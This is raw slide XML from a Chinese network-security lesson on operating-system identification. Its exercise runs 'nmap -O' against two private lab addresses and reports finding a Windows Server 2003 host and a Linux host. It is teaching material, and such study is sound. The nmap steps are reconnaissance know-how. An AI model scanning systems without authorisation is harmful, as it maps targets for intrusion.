          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用命令“nmap -O 192.168.172.129”查看机器的操作系统，可以看到nmap同时把端口和服务进行了扫描，结果如图2-2-64所示，扫描到一台Windows Server 2003操作系统。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5242560" y="2060575"/>
            <a:ext cx="5276850" cy="3695700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5242560" y="5756275"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-64 nmap命令识别操作系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap获取主机操作系统信息</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.3 系统识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5300980" y="917258"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.使用命令“nmap -O 192.168.172.130”查看机器的操作系统，可以看到nmap同时把端口和服务进行了扫描，结果如图2-2-65所示，扫描到一台Linux操作系统。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5300980" y="2116137"/>
            <a:ext cx="5276850" cy="3324225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="文本框 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5300980" y="5440362"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-65 nmap命令识别操作系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786245" y="6761480"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.3 系统识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="文本框 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3479165" y="2651125"/>
            <a:ext cx="5080000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>使用nmap获取主机操作系统信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>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a:xfrm>
            <a:off x="533756" y="1971129"/>
            <a:ext cx="4302496" cy="521035"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="4302496" cy="521035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7274400" y="1887541"/>
              <a:ext cx="1402080" cy="460375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
